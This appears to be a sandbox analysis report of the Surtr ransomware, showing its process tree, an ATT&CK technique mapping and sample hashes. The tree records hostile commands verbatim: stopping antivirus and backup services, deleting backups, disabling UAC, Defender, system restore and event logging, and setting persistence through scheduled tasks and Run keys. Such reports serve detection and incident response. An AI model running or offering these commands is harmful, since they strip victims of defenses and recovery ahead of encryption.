C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos AutoUpdate Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Clean Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures5⤵
- Modifies boot configuration data using bcdedit
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Device Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos File Scanner Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Health Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Agent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos MCS Client"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Message Router"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Safestore Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos System Protection Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Web Control Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Backup Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"3⤵
-
C:\Windows\system32\net.exenet stop "SQLsafe Filter Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"3⤵
-
C:\Windows\system32\net.exenet stop "Symantec System Recovery"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"3⤵
-
C:\Windows\system32\net.exenet stop "Veeam Backup Catalog Data Service"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵
-
C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f4⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"3⤵
- Drops startup file
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"3⤵
- Drops startup file
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"3⤵
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"3⤵
-
C:\Windows\system32\net.exenet stop "macmnsvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"3⤵
-
C:\Windows\system32\net.exenet stop "masvc"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"3⤵
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"3⤵
-
C:\Windows\system32\net.exenet stop "MBAMService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"3⤵
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBEndpointAgent"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"3⤵
- Drops startup file
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"3⤵
-
C:\Windows\system32\net.exenet stop "McShield"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"3⤵
-
C:\Windows\system32\net.exenet stop "mfemms"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"3⤵
-
C:\Windows\system32\net.exenet stop "mfevtp"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"5⤵
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
3Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD511105a794799313a6a6554f28e8619ff
SHA17e5daf92251effa9a831810e2fe93d812235f9cd
SHA256268ff552a04e865ffb669f5e12a581162a54a73c49618db7cca471aad418845a
